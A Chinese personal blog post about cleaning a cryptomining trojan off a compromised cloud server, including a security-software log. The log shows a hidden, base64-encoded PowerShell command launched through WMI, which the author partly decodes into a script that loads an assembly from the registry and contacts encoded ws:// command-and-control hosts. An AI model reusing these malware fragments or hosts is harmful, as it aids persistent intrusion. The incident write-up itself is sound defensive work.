记一次云服务器木马查杀

记录木马查杀过程

Posted by 刘巨 on 2022-07-27

开始

前几天忽然收到华为云的短信通知
说我的云服务器存在对外攻击行为
一下就感觉是服务器被人黑了.
木马查杀

马上提交了工单,让华为云的技术人员帮我查一下服务器有哪些不正常的行为
华为云的技术人员给我反馈也下面这些问题

  1. 异常网络链接
    木马查杀
  2. 异常进程
    木马查杀
  3. 异常文件
    木马查杀
  4. 异常计划
    木马查杀
  5. 异常代理作业
    木马查杀
  6. 挖矿木马文件
    木马查杀

ECS主机已确认被入侵了,然后华为云就把我的外网IP给禁用了.
到这里,这个ECS主机的对外服务已经全部中断
为了快速恢复,我只能通过华为云的控制台用VPC方式登录了云主机
把下面一些明面上的问题全都处理了一下.
然后把所有密码全都修改了

初步定位原因是”疑似数据库弱口令”
然后黑客通过此通道把我服务器攻破了.

把明面上的问题处理完成后,通过工单先让ECS外网恢复了.
个人习惯是不喜欢安装一些安全软件.
因为如果电脑安装了安全软件,会出现一些莫名其妙的问题
特别是在个人电脑上面。
所以在服务器上也没有太注意过安全问题。
只要把密码、端口、防火墙设置好一般来说还是没有问题的
但是千算万算,还是出现了密码泄露,导致服务器被攻破了。

没办法,把明面上能看得出的问题解决后
在朋友的推荐下,不情愿的在服务器安装上了火绒安全软件
把软件设置好后,进行了第一次查杀
木马查杀
一下查出三十多处问题,然后全部用安全软件处理了。
这下放心了不少。

深扒木马

处理现有木马文件后,火绒每几分钟就提示我有程序在隐藏执行PowerShell
木马查杀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
【1】2022-07-27 14:54:15,系统防护,系统加固,scrcons.exe触犯敏感动作防护规则, 已阻止

防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -NoProfile -EncodedCommand dAByAHkADQAKAHsADQAKACQAXwAwADAAMAAwACAAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNACkALgBNAGEAaQBuACkADQAKACQAXwAwADAAMAAxACAAPQBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAXwAwADAAMAAwACkADQAKACQAXwAwADAAMAAyACAAPQAgACQAXwAwADAAMAAxAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAANAAoADQAKAFsAcwB0AHIAaQBuAGcAWwBdAF0AIAAkAF8AMAAwADAAMwAgAD0AIABAACgAIgBDAGkATgAzAGMAegBvAHYATAAzAGQAMwBkAHoAZwB1AFkAVwBSADIAWQBqAGwAbQBlAFgAaABzAFoAagBKADIATABtAE4AdgBiAFQAbwB4AE0AagBNADAATgBTADkAMwBjAHcAbwBqAGQAMwBNADYATAB5ADkAMwBkADMAYwAzAEwAbQBGAGsAZABtAEkANQBaAG4AbAA0AGIARwBZAHkAZABpADUAagBiADIAMAA2AE0AVABJAHoATgBEAFUAdgBkADMATQBLAEkAMwBkAHoATwBpADgAdgBkADMAZAAzAE4AaQA1AGgAWgBIAFoAaQBPAFcAWgA1AGUARwB4AG0ATQBuAFkAdQBZADIAOQB0AE8AagBFAHkATQB6AFEAMQBMADMAZAB6AEMAaQBOADMAYwB6AG8AdgBMADMAZAAzAGQAegBVAHUAWQBXAF
操作结果:已阻止

进程ID:9160
操作进程:C:\Windows\System32\wbem\scrcons.exe
操作进程命令行:C:\Windows\system32\wbem\scrcons.exe -Embedding
操作进程校验和:2F88A2A21F4A40600EE3ED6B7D8D10B62CFEF7AB
父进程ID:796
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k DcomLaunch -p

通过Base64反解码得到要执行的代码

1
2
3
4
5
6
7
try
{
$_0000 =[Convert]::Frombase64String((Get-ItemProperty HKLM:\SYSTEM).Main)
$_0001 =[Reflection.Assembly]::Load($_0000)
$_0002 = $_0001.EntryPoint

[string[]] $_0003 = @("CiN3czovL3d3dzguYWR2YjlmeXhsZjJ2LmNvbToxMjM0NS93cwojd3M6Ly93d3c3LmFkdmI5Znl4bGYydi5jb206MTIzNDUvd3MKI3dzOi8vd3d3Ni5hZHZiOWZ5eGxmMnYuY29tOjEyMzQ1L3dzCiN3czovL3d3dzUuYW

可能记录的执行命令行日志有长度限制,所以只显示了部分日志
所以我们分析出一个不完整的脚本,但是我们可以从前2句代码分析出一些内容

没有时间写了,有时间继续